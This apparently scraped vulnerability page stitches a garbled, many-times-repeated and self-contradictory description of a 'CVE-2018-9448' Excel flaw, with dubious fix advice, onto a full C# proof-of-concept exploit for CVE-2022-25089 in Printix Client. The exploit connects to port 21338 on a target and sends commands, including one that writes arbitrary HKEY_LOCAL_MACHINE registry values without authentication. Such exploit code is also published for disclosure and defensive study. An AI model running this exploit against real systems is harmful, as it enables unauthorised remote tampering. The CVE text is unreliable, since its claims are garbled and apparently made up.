The issue allows attackers to execute arbitrary code on the target system.
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to execute malicious code on the targeted system.
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to execute malicious code on the targeted system.
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to execute malicious code on the targeted system.
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to execute malicious code on the targeted system.
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to
Microsoft Excel and Word Object Model Spoofing Vulnerability
A critical vulnerability has been identified in Microsoft Excel and Word Object Model (WOM) that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel and Word mishandling of document object model (DOM) objects. An attacker can take advantage of this issue to spoof the security context for DOM objects.
Microsoft Excel and How to Fix It
The best way to fix this is by uninstalling Microsoft Excel and then reinstalling a clean version. After the software has been reinstalled, make sure to update it with the latest patches.
Microsoft Excel and Word Software Composition Feature
Microsoft Excel and Word software composition feature allows attackers to bypass code signing by creating a trusted XLL file with a specially crafted macro
CVE-2018-9448 A critical vulnerability has been identified in Microsoft Excel that is tracked as CVE-2018-9448. The issue exists due to Microsoft Excel incorrectly handling ARXML documents. An attacker can take advantage of this issue to execute malicious code on the targeted system.
Exploit
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
/**
* ________________________________________
*
* Printix Vulnerability, CVE-2022-25089
* Part of a Printix Vulnerability series
* Author: Logan Latvala
* Github: https://github.com/ComparedArray/printix-CVE-2022-25089
* ________________________________________
*
*/
namespace ConsoleApp1a
{
public class PersistentRegistryData
{
public PersistentRegistryCmds cmd;
public string path;
public int VDIType;
public byte[] registryData;
}
[JsonConverter(typeof(StringEnumConverter))]
public enum PersistentRegistryCmds
{
StoreData = 1,
DeleteSubTree,
RestoreData
}
public class Session
{
public int commandNumber { get; set; }
public string host { get; set; }
public string data { get; set; }
public string sessionName { get; set; }
public Session(int commandSessionNumber = 0)
{
commandNumber = commandSessionNumber;
switch (commandSessionNumber)
{
//Incase it's initiated, kill it immediately.
case (0):
Environment.Exit(0x001);
break;
//Incase the Ping request is sent though, get its needed data.
case (2):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
data = "pingData";
sessionName = "PingerRinger";
break;
//Incase the RegEdit request is sent though, get its needed data.
case (49):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
//persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
Console.Write("Registry Node: ");
persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);
//persistentRegistryData.registryData = new byte[2];
//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
Console.Write("Type: ");
int dataF = int.Parse(Console.ReadLine());
Console.WriteLine("Set Data to: " + dataF);
Console.WriteLine("\n What value is your type? \n");
Console.Write("Value: ");
string dataB = Console.ReadLine();
Console.WriteLine("Set Data to: " + dataF);
byte[] loader = null;
List<byte> byteContainer = new List<byte>();
//Dword = 4
//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
switch (dataF)
{
case (1):
loader = selectDataType(dataB, RegistryValueKind.String);
byteContainer.Add(1);
break;
case (2):
loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
byteContainer.Add(4);
break;
case (3):
loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
byteContainer.Add(11);
break;
case (4):
loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
byteContainer.Add(7);
break;
}
int pathHolder = 0;
foreach (byte bit in loader)
{
pathHolder++;
byteContainer.Add(bit);
}
persistentRegistryData.registryData = byteContainer.ToArray();
//added stuff:
//PersistentRegistryData data = new PersistentRegistryData();
//data.cmd = PersistentRegistryCmds.RestoreData;
//data.path = "";
//data.cmd
Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
data = JsonConvert.SerializeObject(persistentRegistryData);
break;
//Custom cases, such as custom JSON Inputs and more.
case (100):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
Console.WriteLine("\n What Data Should Be Sent?\n");
Console.Write("Data: ");
data = Console.ReadLine();
Console.WriteLine("Data set to: " + data);
Console.WriteLine("\n What Session Name Should Be Used? \n");
Console.Write("Session Name: ");
sessionName = Console.ReadLine();
Console.WriteLine("Session name set to: " + sessionName);
break;
}
}
public static byte[] selectDataType(object value, RegistryValueKind format)
{
byte[] array = new byte[50];
switch (format)
{
case RegistryValueKind.String: //1
array = Encoding.UTF8.GetBytes((string)value);
break;
case RegistryValueKind.DWord://4
array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
break;
case RegistryValueKind.QWord://11
if (value == null)
{
value = 0L;
}
array = BitConverter.GetBytes((long)value);
break;
case RegistryValueKind.MultiString://7
{
if (value == null)
{
value = new string[1] { string.Empty };
}
string[] array2 = (string[])value;
foreach (string s in array2)
{
byte[] bytes = Encoding.UTF8.GetBytes(s);
byte[] second = new byte[1] { (byte)bytes.Length };
array = array.Concat(second).Concat(bytes).ToArray();
}
break;
}
}
return array;
}
}
class CVESUBMISSION
{
static void Main(string[] args)
{
FORCERESTART:
try
{
//Edit any registry without auth:
//Use command 49, use the code provided on the desktop...
//This modifies it directly, so no specific username is needed. :D
//The command parameter, a list of commands is below.
int command = 43;
//To force the user to input variables or not.
bool forceCustomInput = false;
//The data to send, this isn't flexible and should be used only for specific examples.
//Try to keep above 4 characters if you're just shoving things into the command.
string data = "{\"profileID\":1,\"result\":true}";
//The username to use.
//This is to fulfill the requriements whilst in development mode.
DefaultValues.CurrentSessName = "printixMDNs7914";
//The host to connect to. DEFAULT= "localhost"
string host = "192.168.1.29";
// Configuration Above
InvalidInputLabel:
Console.Clear();
Console.WriteLine("Please select the certificate you want to use with port 21338.");
//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
Console.WriteLine("Already selected, client authentication isn't needed.");
Console.WriteLine(" /───────────────────────────\\ ");
Console.WriteLine("\nWhat would you like to do?");
Console.WriteLine("\n 1. Send Ping Request");
Console.WriteLine(" 2. Send Registry Edit Request");
Console.WriteLine(" 3. Send Custom Request");
Console.WriteLine(" 4. Experimental Mode (Beta)\n");
Console.Write("I choose option # ");
try
{
switch (int.Parse(Console.ReadLine().ToLower()))
{
case (1):
Session session = new Session(2);
command = session.commandNumber;
host = session.host;
data = session.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (2):
Session sessionTwo = new Session(49);
command = sessionTwo.commandNumber;
host = sessionTwo.host;
data = sessionTwo.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (3):
Console.WriteLine("What command number do you want to input?");
command = int.Parse(Console.ReadLine().ToString());
Console.WriteLine("What IP would you like to use? (Default = localhost)");
host = Console.ReadLine();
Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
data = Console.ReadLine();
Console.WriteLine("What session name do you want to use? ");
DefaultValues.CurrentSessName = Console.ReadLine();
break;
case (4):
Console.WriteLine("Not yet implemented.");
break;
}
}
catch (Exception e)
{
Console.WriteLine("Invalid Input!");
goto InvalidInputLabel;
}
Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
CompCommClient client = new CompCommClient();
byte[] responseStorage = new byte[25555];
int responseCMD = 0;
client.Connect(host, 21338, 3, 10000);
client.SendMessage(command, Encoding.UTF8.GetBytes(data));
// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
// Check for output multiple times, and see if this is conclusive.
//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
new Thread(() => {
//Thread.Sleep(4000);
if (client.Connected())
{
int cam = 0;
// 4 itterations of loops, may be lifted in the future.
while (cam < 5)
{
//Reads the datastream and keeps returning results.
//Thread.Sleep(100);
try
{
try
{
if (responseStorage?.Any() == true)
{
//List<byte> byo1 = responseStorage.ToList();
if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
{
foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
{
if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
{
Console.Write(cam2);
}
}
}else
{
}
}
}
catch (Exception e) { Debug.WriteLine(e); }
client.Read(out responseCMD, out responseStorage);
}
catch (Exception e)
{
goto ReadException;
}
Thread.Sleep(100);
cam++;
//Console.WriteLine(cam);
}
}
else
{
Console.WriteLine("[WARNING]: Client is Disconnected!");
}
ReadException:
try
{
Console.WriteLine("Command Variable Response: " + responseCMD);
Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
client.disConnect();
}
catch (Exception e)
{
Console.WriteLine("After 4.2 Seconds, there has been no response!");
client.disConnect();
}
}).Start();
Console.WriteLine(responseCMD);
Console.ReadLine();
}
catch (Exception e)
{
Console.WriteLine(e);
Console.ReadLine();
//Environment.Exit(e.HResult);
}
goto FORCERESTART;
}
}
}
Timeline
Published on: 03/03/2022 00:15:00 UTC
Last modified on: 05/10/2022 17:15:00 UTC